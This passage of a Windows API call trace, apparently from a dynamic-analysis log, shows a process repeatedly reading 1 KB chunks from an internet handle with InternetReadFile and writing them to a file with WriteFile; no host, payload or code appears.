lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.565] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.565] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.566] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.566] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.566] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.566] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.567] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.567] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.567] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.567] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.567] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.567] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.567] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.568] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.568] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.568] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.568] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.568] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.568] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.569] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.569] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.569] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.569] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.569] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.569] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.569] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.570] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.570] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.570] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.570] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.570] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.571] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.571] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.571] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.571] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.571] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.571] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.572] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.572] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.572] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.572] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.572] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.572] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.573] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.573] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.573] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.573] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.574] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.574] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.574] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.574] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.575] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.575] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.575] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.575] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.575] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.576] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.576] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.576] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.576] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.577] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.577] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.577] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.577] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.577] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.577] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.577] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.577] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.578] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.578] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.578] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.578] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.578] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.578] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.578] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.579] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.579] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.579] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.579] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.579] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.579] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.579] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.580] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.580] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.580] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.580] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.580] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.580] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.580] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.581] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.581] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.581] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: lpBuffer=0x19d22c*, lpdwNumberOfBytesRead=0x19d224*=0x400) returned 1 [0206.628] WriteFile (in: hFile=0x398, lpBuffer=0x19d22c*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x19d21c, lpOverlapped=0x0 | out: lpBuffer=0x19d22c*, lpNumberOfBytesWritten=0x19d21c*=0x400, lpOverlapped=0x0) returned 1 [0206.628] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x19d22c, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x19d224 | out: 